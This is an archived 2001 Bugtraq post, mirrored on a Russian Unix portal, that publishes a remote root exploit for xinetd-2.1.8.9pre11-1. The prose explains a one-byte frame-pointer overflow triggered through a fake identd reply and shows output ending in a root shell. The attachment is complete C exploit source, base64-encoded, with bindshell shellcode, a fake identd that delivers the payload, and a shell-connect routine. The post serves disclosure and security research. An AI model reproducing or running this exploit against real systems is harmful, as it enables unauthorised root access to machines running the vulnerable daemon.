BSD, Linux, Cisco, Web, Palm, other unix RUSSIAN version Search:  Выпущена CD-версия OpenNet.RU для оффлайн просмотра. Для формирования заказа - перейдите по ссылке. SOFT - Unix Software catalog LINKS - Unix resources TOPIC - Articles from usenet DOCUMENTATION - Unix guides News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Date: Fri, 29 Jun 2001 14:31:07 +0200 (CEST)
From: qitest1 <qitest1@cercaband.com>
To: bugtraq@securityfocus.com
Subject: Exploit for xinetd-2.1.8.9pre11-1

--8323328-1464676421-993817866=:1188
Content-Type: TEXT/PLAIN; charset=US-ASCII


Hi bugtraq.

I read the zen-parse's advisory about the 'potential' overflow, as he
said, in xinetd-2.1.8.9pre11-1 and I tried to work around it.
 
First of all we have to remember that the bof occurs _only_ if, in the
configuration file of the daemon, there is an entry like this:
        log_on_success = HOST PID USERID
this option can be set as a default for all the services or just for
some of them. 'USERID' means that xinetd will do an auth request
to the identd daemon of the remote client host using a service
provided by xinetd, as described in the rfc 1413. This option is not
present in the default installation from the tar.gz release.

Of course I wrote a fake_identd ready to answer to xinetd auth requests
for exploiting this vuln. 
I found that the ebp register can be overwritten for a maximum of 
2 bytes, 1 byte of overflow and 1 byte of \x00, termination string. 
This happens in particular conditions, that is only if our source port
is 1 and the service we want to connect is at a port such as 23. 
If we try to overflow with more bytes, the string will result too long 
and the bof won't occur at all.

Surely it is quite hard to exploit. But an one-byte overflow is enough 
for us to get a root shell.

klog explained this kind of exploitation some time ago. 
He wrote that, at the end of the bugged function, "%ebp is 
moved into %esp, which is incremented by 4 since 
%ebp is poped from the stack just before the RET.", and that 
"When the processor returns from a procedure, it only pops the
first word on the stack, guessing it is the original %eip. But if
we alter %esp, we can make the processor pop any value from the
stack as if it was %eip, and thus changing the execution flow."
Exactly what we'll do.

The lsb of the ebp will be set to 0x00 through the overflow. So at that 
addr increased by 0x04 we will write a pointer pointing to the nop padding 
before the shellcode, which will be executed, without crashing the daemon. 
Fortunately, we are able to write to that memory location, as it is 
part of the buffer to overflow. Of course an executable stack is needed.

On my Red Hat 6.2 box:

[root@localhost exploit]# ./xinetd0x69 -h localhost

  xinetd-2.1.8.9pre11-1 exploit by qitest1

+Host: localhost
  as: Red Hat 6.2 with xinetd-2.1.8.9pre11-1
+Using: retaddr = 0xbffff44b and sc_addr_pos = 985...
  ok
+Starting fake_identd...
  fake_identd forking into background
+Causing an auth request to our fake_identd
  done
+Enjoy your root shell...
  0x69 =)
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Linux localhost 2.2.18 #3 SMP Fri Mar 16 22:20:42 CET 2001 i586 unknown

bye

-- 
/* qitest1		http://qitest1.cjb.net *
 *    ``Ut tensio, sic vis. 69 tecum sis.''    *
 * main(){if(unsatisfied == 69) try_come(in);} */


--8323328-1464676421-993817866=:1188
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="xinetd0x69.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.21.0106291431060.1188@localhost.localdomain>
Content-Description: 
Content-Disposition: attachment; filename="xinetd0x69.c"

LyoNCiAqIHhpbmV0ZC0yLjEuOC45cHJlMTEtMSBMaW51eCB4ODYgcmVtb3Rl
IHJvb3QgZXhwbG9pdA0KICogYnkgcWl0ZXN0MSAyOC8wNi8yMDAxDQogKg0K
ICogVGhpcyBpcyBhIHByb29mIG9mIGNvbmNlcHQgY29kZSBmb3IgdGhlIGV4
cGxvaXRhdGlvbiBvZiB0aGUgYm9mDQogKiBwcmVzZW50IGluIHhpbmV0ZC0y
LjEuOC45cHJlMTEtMS4gUmVhZCB0aGUgYWR2aXNvcmllcyBmaXJzdC4gVGhl
DQogKiBjb2RlIHVzZXMgYSBzaW5nbGUtYnl0ZSBjb3JydXB0aW9uIG9mIHRo
ZSBmcCwgYXMgZXhwbGFpbmVkIGJ5IGtsb2cuDQogKiBzY19hZGRyX3BvcyBp
cyB0aGUgcG9zaXRpb24sIGZyb20gdGhlIGJlZ2lubmluZyBvZiB0aGUgd3Jp
dGFibGUNCiAqIGFyZWEsIHdoZXJlIGEgcG9pbnRlciB0byB0aGUgbm9wIHdp
bGwgYmUgcGxhY2VkLg0KICoNCiAqIEZvciBldGhpY2FsIHJlYXNvbnMganVz
dCBvbmUgaGFyZGNvZGVkIHRhcmdldCB0eXBlIHdpbGwgYmUgcHJvdmlkZWQu
IA0KICogSXRzIHZhbHVlcyB3b3JrIG9ubHkgYWdhaW5zdCBvbmUgb2YgdGhl
IGJ1Z2dlZCAncHJlJyByZWxlYXNlcyBvZiANCiAqIHhpbmV0ZCwgaW5zdGFs
bGVkIG9uIG15IFJlZCBIYXQgNi4yIGJveC4gTm90IGZvciBraWRkaWVzLg0K
ICoNCiAqIEdyZWV0czogemVuLXBhcnNlLCBmb3IgaGF2aW5nIGZvdW5kIHRo
aXMgYnVnDQogKgkgICBrbG9nLCBmb3IgaGlzIHBhcGVyIGFib3V0IHRoZSBm
cCBjb3JydXB0aW9uDQogKgkgICBhbGwgbXkgZnJpZW5kcyBvbiB0aGUgaW50
ZXJuZXQgPSkNCiAqDQogKiAxMDAlIHB1cmUgMHg2OS4gPSkgICANCiAqLw0K
DQojaW5jbHVkZSA8c3RkaW8uaD4NCiNpbmNsdWRlIDxzdHJpbmcuaD4NCiNp
bmNsdWRlIDx1bmlzdGQuaD4NCiNpbmNsdWRlIDxuZXRpbmV0L2luLmg+DQoj
aW5jbHVkZSA8bmV0ZGIuaD4NCg0KI2RlZmluZSBNWV9QT1JUICAgICAgICAg
MQ0KI2RlZmluZSBUSEVJUl9QT1JUICAgICAgMjMgDQojZGVmaW5lIElERU5U
RF9QT1JUICAgICAxMTMNCiNkZWZpbmUgRklSU1RfUEFEICAgICAgIDEwMDkN
Cg0KICBzdHJ1Y3QgdGFyZw0KICAgIHsNCiAgICAgIGludCAgICAgICAgICAg
ICAgICAgIGRlZjsNCiAgICAgIGNoYXIgICAgICAgICAgICAgICAgICpkZXNj
cjsNCiAgICAgIHVuc2lnbmVkIGxvbmcgaW50ICAgIHJldGFkZHI7DQogICAg
ICBpbnQJCSAgIHNjX2FkZHJfcG9zOw0KICAgIH07DQoNCiAgc3RydWN0IHRh
cmcgdGFyZ2V0W109DQogICAgeyAgICAgICAgICAgICAgICAgICANCiAgICAg
IHswLCAiUmVkIEhhdCA2LjIgd2l0aCB4aW5ldGQtMi4xLjguOXByZTExLTEi
LCAweGJmZmZmNDRiLCA5ODV9LA0KICAgICAgezY5LCBOVUxMLCAwfQ0KICAg
IH07DQoNCiAgY2hhciBzaGVsbGNvZGVbXSA9IC8qIFRhZWhvIE9oIGJpbmRz
aGVsbCBjb2RlIGF0IHBvcnQgMzA0NjQgKi8NCiAgIlx4MzFceGMwXHhiMFx4
MDJceGNkXHg4MFx4ODVceGMwXHg3NVx4NDNceGViXHg0M1x4NWVceDMxXHhj
MCINCiAgIlx4MzFceGRiXHg4OVx4ZjFceGIwXHgwMlx4ODlceDA2XHhiMFx4
MDFceDg5XHg0Nlx4MDRceGIwXHgwNiINCiAgIlx4ODlceDQ2XHgwOFx4YjBc
eDY2XHhiM1x4MDFceGNkXHg4MFx4ODlceDA2XHhiMFx4MDJceDY2XHg4OSIN
CiAgIlx4NDZceDBjXHhiMFx4NzdceDY2XHg4OVx4NDZceDBlXHg4ZFx4NDZc
eDBjXHg4OVx4NDZceDA0XHgzMSINCiAgIlx4YzBceDg5XHg0Nlx4MTBceGIw
XHgxMFx4ODlceDQ2XHgwOFx4YjBceDY2XHhiM1x4MDJceGNkXHg4MCINCiAg
Ilx4ZWJceDA0XHhlYlx4NTVceGViXHg1Ylx4YjBceDAxXHg4OVx4NDZceDA0
XHhiMFx4NjZceGIzXHgwNCINCiAgIlx4Y2RceDgwXHgzMVx4YzBceDg5XHg0
Nlx4MDRceDg5XHg0Nlx4MDhceGIwXHg2Nlx4YjNceDA1XHhjZCINCiAgIlx4
ODBceDg4XHhjM1x4YjBceDNmXHgzMVx4YzlceGNkXHg4MFx4YjBceDNmXHhi
MVx4MDFceGNkXHg4MCINCiAgIlx4YjBceDNmXHhiMVx4MDJceGNkXHg4MFx4
YjhceDJmXHg2Mlx4NjlceDZlXHg4OVx4MDZceGI4XHgyZiINCiAgIlx4NzNc
eDY4XHgyZlx4ODlceDQ2XHgwNFx4MzFceGMwXHg4OFx4NDZceDA3XHg4OVx4
NzZceDA4XHg4OSINCiAgIlx4NDZceDBjXHhiMFx4MGJceDg5XHhmM1x4OGRc
eDRlXHgwOFx4OGRceDU2XHgwY1x4Y2RceDgwXHgzMSINCiAgIlx4YzBceGIw
XHgwMVx4MzFceGRiXHhjZFx4ODBceGU4XHg1Ylx4ZmZceGZmXHhmZiI7DQoN
CiAgY2hhciAgIHpidWZbMTAyNF0sIGhvc3RbNTEyXTsNCiAgaW50CSBzZWwg
PSAwLCBvZmZzZXQgPSAwOw0KDQogIGludCAgICBzb2NrYW1pMihjaGFyICpo
b3N0LCBpbnQgbXlfcG9ydCwgaW50IHRoZWlyX3BvcnQpOw0KICB2b2lkICAg
ZmFrZV9pZGVudGQodm9pZCk7DQogIHZvaWQgICBsMzN0X2J1Zih2b2lkKTsN
CiAgc3RhdGljIHZvaWQga2VlcF9jbHoodm9pZCkgX19hdHRyaWJ1dGVfXyAo
KGRlc3RydWN0b3IpKTsNCiAgdm9pZCAJIHNoZWxsYW1pKGludCBzb2NrKTsN
CiAgdm9pZCAgIHVzYWdlKGNoYXIgKnByb2duYW1lKTsNCg0KaW50DQptYWlu
KGludCBhcmdjLCBjaGFyICoqYXJndikNCnsNCiAgaW50CXNvY2ssIGNudDsN
Cg0KICBwcmludGYoIlxuICB4aW5ldGQtMi4xLjguOXByZTExLTEgZXhwbG9p
dCBieSBxaXRlc3QxXG5cbiIpOw0KICANCiAgaWYoZ2V0dWlkKCkpDQogICAg
ICAgIHsNCiAgICAgICAgICBmcHJpbnRmKHN0ZGVyciwgIk11c3QgYmUgcm9v
dCBiYWJlXG4iKTsNCiAgICAgICAgICBleGl0KDEpOw0KICAgICAgICB9DQoN
CiAgaWYoYXJnYyA9PSAxKQ0KICAgICAgICB1c2FnZShhcmd2WzBdKTsNCiAg
aG9zdFswXSA9IDA7DQogIHdoaWxlKChjbnQgPSBnZXRvcHQoYXJnYyxhcmd2
LCJoOnQ6bzpzOiIpKSAhPSBFT0YpDQogICAgew0KICAgc3dpdGNoKGNudCkN
CiAgICAgICAgew0KICAgY2FzZSAnaCc6DQogICAgIHN0cm5jcHkoaG9zdCwg
b3B0YXJnLCBzaXplb2YoaG9zdCkpOw0KICAgICBob3N0W3NpemVvZihob3N0
KV0gPSAnXHgwMCc7DQogICAgIGJyZWFrOw0KICAgY2FzZSAndCc6DQogICAg
IHNlbCA9IGF0b2kob3B0YXJnKTsgICAgICAgDQogICAgIGJyZWFrOw0KICAg
Y2FzZSAnbyc6DQogICAgIG9mZnNldCA9IGF0b2kob3B0YXJnKTsNCiAgICAg
YnJlYWs7DQogICBjYXNlICdzJzoNCiAgICAgdGFyZ2V0W3NlbF0uc2NfYWRk
cl9wb3MgPSBhdG9pKG9wdGFyZyk7DQogICAgIGJyZWFrOw0KICAgZGVmYXVs
dDoNCiAgICAgdXNhZ2UoYXJndlswXSk7DQogICAgIGJyZWFrOw0KICAgICAg
ICB9DQogICAgfQ0KICBpZihob3N0WzBdID09IDApDQogICAgICAgIHVzYWdl
KGFyZ3ZbMF0pOw0KDQogIHByaW50ZigiK0hvc3Q6ICVzXG4gIGFzOiAlc1xu
IiwgaG9zdCwgdGFyZ2V0W3NlbF0uZGVzY3IpOw0KICB0YXJnZXRbc2VsXS5y
ZXRhZGRyICs9IG9mZnNldDsNCiAgcHJpbnRmKCIrVXNpbmc6IHJldGFkZHIg
PSAlcCBhbmQgc2NfYWRkcl9wb3MgPSAlZC4uLlxuICBva1xuIiwNCiAgdGFy
Z2V0W3NlbF0ucmV0YWRkciwgdGFyZ2V0W3NlbF0uc2NfYWRkcl9wb3MpOw0K
ICBwcmludGYoIitTdGFydGluZyBmYWtlX2lkZW50ZC4uLlxuIik7DQogIGZh
a2VfaWRlbnRkKCk7DQogIHJldHVybjsNCn0NCg0KaW50DQpzb2NrYW1pMihj
aGFyICpob3N0LCBpbnQgbXlfcG9ydCwgaW50IHRoZWlyX3BvcnQpDQp7DQog
IHN0cnVjdCAgICAgICAgc29ja2FkZHJfaW4gYWRkcmVzczsNCiAgc3RydWN0
ICAgICAgICBzb2NrYWRkcl9pbiBteV9hZGRyOw0KICBzdHJ1Y3QgICAgICAg
IGhvc3RlbnQgKmhwOw0KICBpbnQgICAgICAgICAgIHNvY2s7DQoNCiAgc29j
ayA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgMCk7DQogIGlmKHNv
Y2sgPT0gLTEpDQogICAgICAgIHsNCiAgICAgICAgICBwZXJyb3IoInNvY2tl
dCgpIik7DQogICAgICAgICAgZXhpdCgtMSk7DQogICAgICAgIH0NCiANCiAg
aHAgPSBnZXRob3N0YnluYW1lKGhvc3QpOw0KICBpZihocCA9PSBOVUxMKQ0K
ICAgICAgICB7DQogICAgICAgICAgcGVycm9yKCJnZXRob3N0YnluYW1lKCki
KTsNCiAgICAgICAgICBleGl0KC0xKTsNCiAgICAgICAgfQ0KDQogIG15X2Fk
ZHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogIG15X2FkZHIuc2luX3BvcnQg
PSBodG9ucyhteV9wb3J0KTsNCiAgbXlfYWRkci5zaW5fYWRkci5zX2FkZHIg
PSBJTkFERFJfQU5ZOw0KICBiemVybygmKG15X2FkZHIuc2luX3plcm8pLCA4
KTsNCg0KICBpZihiaW5kKHNvY2ssIChzdHJ1Y3Qgc29ja2FkZHIgKikmbXlf
YWRkciwNCiAgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpID09IC0xKQ0KICAg
ICAgICB7DQogICAgICAgICAgcGVycm9yKCJiaW5kKCkiKTsNCiAgICAgICAg
ICBleGl0KDEpOw0KICAgICAgICB9DQoNCiAgbWVtc2V0KCZhZGRyZXNzLCAw
LCBzaXplb2YoYWRkcmVzcykpOw0KICBtZW1jcHkoKGNoYXIgKikgJmFkZHJl
c3Muc2luX2FkZHIsIGhwLT5oX2FkZHIsIGhwLT5oX2xlbmd0aCk7DQogIGFk
ZHJlc3Muc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogIGFkZHJlc3Muc2luX3Bv
cnQgPSBodG9ucyh0aGVpcl9wb3J0KTsNCg0KICBpZihjb25uZWN0KHNvY2ss
IChzdHJ1Y3Qgc29ja2FkZHIgKikgJmFkZHJlc3MsIA0KICBzaXplb2YoYWRk
cmVzcykpID09IC0xKQ0KICAgICAgICB7DQogICAgICAgICAgcGVycm9yKCJj
b25uZWN0KCkiKTsNCiAgICAgICAgICBleGl0KC0xKTsNCiAgICAgICAgfQ0K
DQogIHJldHVybihzb2NrKTsNCn0NCg0Kdm9pZA0KZmFrZV9pZGVudGQodm9p
ZCkNCnsNCiAgaW50ICAgICAgICAgICBzb2NrZmQsIG5ld19mZCwgc2luX3Np
emUsIHJlbV9wb3J0LCBsb2NfcG9ydCwgaTsNCiAgY2hhciAgICAgICAgICBy
YnVmWzEwMjRdLCBzYnVmWzEwMjRdLCBjaWZbNl0sICpwdHI7DQogIHN0cnVj
dCAgICAgICAgc29ja2FkZHJfaW4gbXlfYWRkcjsgICANCiAgc3RydWN0ICAg
ICAgICBzb2NrYWRkcl9pbiB0aGVpcl9hZGRyOyAgICAgICAgDQoNCiAgcHJp
bnRmKCIgIGZha2VfaWRlbnRkIGZvcmtpbmcgaW50byBiYWNrZ3JvdW5kXG4i
KTsNCiAgaWYgKCFmb3JrKCkpDQogICAgew0KICAgICAgICBpZigoc29ja2Zk
ID0gc29ja2V0KEFGX0lORVQsIFNPQ0tfU1RSRUFNLCAwKSkgPT0gLTEpIA0K
ICAgICAgICAgIHsNCiAgICAgICAgICAgIHBlcnJvcigic29ja2V0KCkiKTsN
CiAgICAgICAgICAgIGV4aXQoMSk7DQogICAgICAgICAgfQ0KICAgICAgICAN
CiAgICAgICAgbXlfYWRkci5zaW5fZmFtaWx5ID0gQUZfSU5FVDsgICAgICAg
ICANCiAgICAgICAgbXlfYWRkci5zaW5fcG9ydCA9IGh0b25zKElERU5URF9Q
T1JUKTsgICAgIA0KICAgICAgICBteV9hZGRyLnNpbl9hZGRyLnNfYWRkciA9
IElOQUREUl9BTlk7IA0KICAgICAgICBiemVybygmKG15X2FkZHIuc2luX3pl
cm8pLCA4KTsgICAgICAgIA0KDQogICAgICAgIGlmKGJpbmQoc29ja2ZkLCAo
c3RydWN0IHNvY2thZGRyICopJm15X2FkZHIsIA0KICAgICAgICBzaXplb2Yo
c3RydWN0IHNvY2thZGRyKSkgPT0gLTEpIA0KICAgICAgICAgIHsNCiAgICAg
ICAgICAgIHBlcnJvcigiYmluZCgpIik7DQogICAgICAgICAgICBleGl0KDEp
Ow0KICAgICAgICAgIH0NCg0KICAgICAgICBpZihsaXN0ZW4oc29ja2ZkLCAx
KSA9PSAtMSkNCiAgICAgICAgICB7DQogICAgICAgICAgICBwZXJyb3IoImxp
c3RlbigpIik7DQogICAgICAgICAgICBleGl0KDEpOw0KICAgICAgICAgIH0N
Cg0KICAgICAgICB3aGlsZSgxKQ0KICAgICAgICAgIHsgIA0KICAgICAgICAg
ICAgc2luX3NpemUgPSBzaXplb2Yoc3RydWN0IHNvY2thZGRyX2luKTsNCiAg
ICAgICAgICAgIGlmKChuZXdfZmQgPSBhY2NlcHQoc29ja2ZkLCAoc3RydWN0
IHNvY2thZGRyICopJnRoZWlyX2FkZHIsIA0KICAgICAgICAgICAgJnNpbl9z
aXplKSkgPT0gLTEpIA0KICAgICAgICAgICAgICB7DQogICAgICAgICAgICAg
ICAgcGVycm9yKCJhY2NlcHQoKSIpOw0KICAgICAgICAgICAgICAgIGNvbnRp
bnVlOw0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgLyogRmFrZSBzZXNz
aW9uIA0KICAgICAgICAgKi8NCiAgICAgICAgICAgIG1lbXNldChyYnVmLCAw
LCBzaXplb2YocmJ1ZikpOw0KICAgICAgICAgICAgcmVjdihuZXdfZmQsIHJi
dWYsIHNpemVvZihyYnVmKSwgMCk7DQoNCiAgICAgICAgLyogUGFyc2luZyBv
ZiBxdWVyeQ0KICAgICAgICAgKi8NCiAgICAgICAgICAgIHB0ciA9IHJidWY7
IGkgPSAwOw0KICAgICAgICAgICAgd2hpbGUoKnB0ciAhPSAnLCcpDQogICAg
ICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICBjaWZbaV0gPSAqcHRyOw0K
ICAgICAgICAgICAgICAgICpwdHIrKzsgaSArKzsNCiAgICAgICAgICAgICAg
fQ0KICAgICAgICAgICAgc3NjYW5mKGNpZiwgIiVkIiwgJnJlbV9wb3J0KTsg
DQogICAgICAgICAgICBtZW1zZXQoY2lmLCAwLCBzaXplb2YoY2lmKSk7DQog
ICAgICAgICAgICAqcHRyKys7IGkgPSAwOw0KICAgICAgICAgICAgd2hpbGUo
KnB0ciAhPSAnICcpDQogICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAg
ICBjaWZbaV0gPSAqcHRyOw0KICAgICAgICAgICAgICAgICpwdHIrKzsgaSsr
Ow0KICAgICAgICAgICAgICB9DQogICAgICAgICAgICBzc2NhbmYoY2lmLCAi
JWQiLCAmbG9jX3BvcnQpOyANCiAgICAgICAgDQogICAgICAgICAgICBsMzN0
X2J1ZigpOw0KICAgICAgICANCiAgICAgICAgICAgIG1lbXNldChzYnVmLCAw
LCBzaXplb2Yoc2J1ZikpOw0KICAgICAgICAgICAgc3ByaW50ZihzYnVmLCAi
JWQsJWQ6VVNFUklEOiVzXHJcbiIsIA0KICAgICAgICAgICAgcmVtX3BvcnQs
IGxvY19wb3J0LCB6YnVmKTsNCiAgICAgICAgICAgIHNlbmQobmV3X2ZkLCBz
YnVmLCBzdHJsZW4oc2J1ZiksIDApOw0KDQogICAgICAgICAgICBtZW1zZXQo
cmJ1ZiwgMCwgc2l6ZW9mKHJidWYpKTsNCiAgICAgICAgICAgIHJlY3YobmV3
X2ZkLCByYnVmLCBzaXplb2YocmJ1ZiksIDApOw0KDQogICAgICAgIC8qIEVu
ZA0KICAgICAgICAgKi8NCiAgICAgICAgICB9DQogICAgfQ0KICByZXR1cm47
DQp9DQoNCnZvaWQNCmwzM3RfYnVmKHZvaWQpDQp7DQogIGludCAgICAgICAg
ICAgaSwgbiA9IDA7DQoNCiAgbWVtc2V0KHpidWYsIDAsIHNpemVvZih6YnVm
KSk7DQogIGZvcihpID0gMDsgaSA8IEZJUlNUX1BBRDsgaSsrKQ0KICAgICAg
ICB6YnVmW2ldID0gJ1x4NjknOw0KDQogIG1lbXNldCh6YnVmLCAweDkwLCB0
YXJnZXRbc2VsXS5zY19hZGRyX3BvcyAtIDEpOw0KICBmb3IoaSA9IHRhcmdl
dFtzZWxdLnNjX2FkZHJfcG9zIC0gc3RybGVuKHNoZWxsY29kZSk7IA0KICAg
ICAgaSA8IHRhcmdldFtzZWxdLnNjX2FkZHJfcG9zOyANCiAgICAgIGkrKykN
CiAgICAgICAgemJ1ZltpXSA9IHNoZWxsY29kZVtuKytdOw0KICANCiAgemJ1
Zlt0YXJnZXRbc2VsXS5zY19hZGRyX3BvcyArIDBdID0gDQoJKHVfY2hhcikg
KHRhcmdldFtzZWxdLnJldGFkZHIgJiAweDAwMDAwMGZmKTsNCiAgemJ1Zlt0
YXJnZXRbc2VsXS5zY19hZGRyX3BvcyArIDFdID0gDQoJKHVfY2hhcikoKHRh
cmdldFtzZWxdLnJldGFkZHIgJiAweDAwMDBmZjAwKSA+PiA4KTsNCiAgemJ1
Zlt0YXJnZXRbc2VsXS5zY19hZGRyX3BvcyArIDJdID0gDQoJKHVfY2hhciko
KHRhcmdldFtzZWxdLnJldGFkZHIgJiAweDAwZmYwMDAwKSA+PiAxNik7DQog
IHpidWZbdGFyZ2V0W3NlbF0uc2NfYWRkcl9wb3MgKyAzXSA9IA0KCSh1X2No
YXIpKCh0YXJnZXRbc2VsXS5yZXRhZGRyICYgMHhmZjAwMDAwMCkgPj4gMjQp
Ow0KDQogIHJldHVybjsNCn0NCg0Kdm9pZA0Ka2VlcF9jbHoodm9pZCkNCnsN
CiAgaW50CXNvY2s7DQoNCiAgaWYoaG9zdFswXSAhPSAwKQ0KCXsNCgkgIHBy
aW50ZigiK0NhdXNpbmcgYW4gYXV0aCByZXF1ZXN0IHRvIG91ciBmYWtlX2lk
ZW50ZFxuIik7DQogIAkgIHNvY2sgPSBzb2NrYW1pMihob3N0LCBNWV9QT1JU
LCBUSEVJUl9QT1JUKTsgDQogIAkgIHByaW50ZigiICBkb25lXG4iKTsNCiAg
CSAgY2xvc2Uoc29jayk7DQoNCgkgIHByaW50ZigiK0Vuam95IHlvdXIgcm9v
dCBzaGVsbC4uLlxuICAweDY5ID0pXG4iKTsNCgkgIHNsZWVwKDEpOw0KCSAg
c29jayA9IHNvY2thbWkyKGhvc3QsIDY5NjksIDMwNDY0KTsNCgkgIHNoZWxs
YW1pKHNvY2spOw0KCX0NCn0NCg0Kdm9pZA0Kc2hlbGxhbWkoaW50IHNvY2sp
DQp7DQogIGludCAgICAgICAgICAgICBuOw0KICBjaGFyICAgICAgICAgICAg
cmVjdmJ1ZlsxMDI0XSwgKmNtZCA9ICJpZDsgdW5hbWUgLWFcbiI7DQogIGZk
X3NldCAgICAgICAgICByc2V0Ow0KDQogIHNlbmQoc29jaywgY21kLCBzdHJs
ZW4oY21kKSwgMCk7DQoNCiAgd2hpbGUgKDEpDQogICAgew0KICAgICAgRkRf
WkVSTygmcnNldCk7DQogICAgICBGRF9TRVQoc29jaywgJnJzZXQpOw0KICAg
ICAgRkRfU0VUKFNURElOX0ZJTEVOTywgJnJzZXQpOw0KICAgICAgc2VsZWN0
KHNvY2srMSwgJnJzZXQsIE5VTEwsIE5VTEwsIE5VTEwpOw0KICAgICAgaWYo
RkRfSVNTRVQoc29jaywgJnJzZXQpKQ0KICAgICAgICB7DQogICAgICAgICAg
biA9IHJlYWQoc29jaywgcmVjdmJ1ZiwgMTAyNCk7DQogICAgICAgICAgaWYg
KG4gPD0gMCkNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgcHJpbnRm
KCJDb25uZWN0aW9uIGNsb3NlZCBieSBmb3JlaWduIGhvc3QuXG4iKTsNCiAg
ICAgICAgICAgICAgZXhpdCgwKTsNCiAgICAgICAgICAgIH0NCiAgICAgICAg
ICByZWN2YnVmW25dID0gMDsNCiAgICAgICAgICBwcmludGYoIiVzIiwgcmVj
dmJ1Zik7DQogICAgICAgIH0NCiAgICAgIGlmIChGRF9JU1NFVChTVERJTl9G
SUxFTk8sICZyc2V0KSkNCiAgICAgICAgew0KICAgICAgICAgIG4gPSByZWFk
KFNURElOX0ZJTEVOTywgcmVjdmJ1ZiwgMTAyNCk7DQogICAgICAgICAgaWYg
KG4gPiAwKQ0KICAgICAgICAgICAgew0KICAgICAgICAgICAgICByZWN2YnVm
W25dID0gMDsNCiAgICAgICAgICAgICAgd3JpdGUoc29jaywgcmVjdmJ1Ziwg
bik7DQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICB9DQogIHJldHVy
bjsNCn0NCg0Kdm9pZA0KdXNhZ2UoY2hhciAqcHJvZ25hbWUpDQp7DQogIGlu
dCAgaSA9IDA7DQogIA0KICBwcmludGYoIlVzYWdlOiAlcyBbb3B0aW9uc11c
biIsIHByb2duYW1lKTsNCiAgcHJpbnRmKCJPcHRpb25zOlxuIg0KICAgICAg
ICAgIiAgLWggaG9zdG5hbWVcbiINCiAgICAgICAgICIgIC10IHRhcmdldFxu
Ig0KICAgICAgICAgIiAgLW8gb2Zmc2V0XG4iDQoJICIgIC1zIHNjX2FkZHJf
cG9zXG4iDQogICAgICAgICAiQXZhaWxhYmxlIHRhcmdldHM6XG4iKTsNCiAg
d2hpbGUodGFyZ2V0W2ldLmRlZiAhPSA2OSkNCiAgICAgICAgeyANCiAgICAg
ICAgICBwcmludGYoIiAgJWQpICVzXG4iLCB0YXJnZXRbaV0uZGVmLCB0YXJn
ZXRbaV0uZGVzY3IpOw0KICAgICAgICAgIGkrKzsNCiAgICAgICAgfSANCg0K
ICBleGl0KDEpOw0KfQ0K
--8323328-1464676421-993817866=:1188--

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Быстрая навигация по сайту __________________ КАТАЛОГИ: Каталог программного обеспечения Каталог ссылок на unix ресурсы Каталог тематических статей Архив документации Советы, заметки MAN - Системные руководства __________________ НОВОСТИ: Новости OpenNews LastSoft - Свежий софт Обзоры ПО с freshmeat Проблемы безопасности Новости с других сайтов __________________ ОБЩЕНИЕ: Форум/Конферения _______________ МИНИ-ПОРТАЛЫ: CISCO.opennet.ru BSD.opennet.ru LINUX.opennet.ru SOLARIS.opennet.ru WEB.opennet.ru - web-технологии SECURITY.opennet.ru PALM.opennet.ru - карманные ПК __________________ НАВИГАЦИЯ: Навигация по ключевым словам Системы ПОИСКА __________________ РАЗНОЕ: ЦУП - Центр Управления Проектом Добавление в каталоги Закладки Добавить в закладки Created 1996-2003 by Maxim Chirkov   Добавить, Реклама, Вебмастеру, ЦУП, ГИД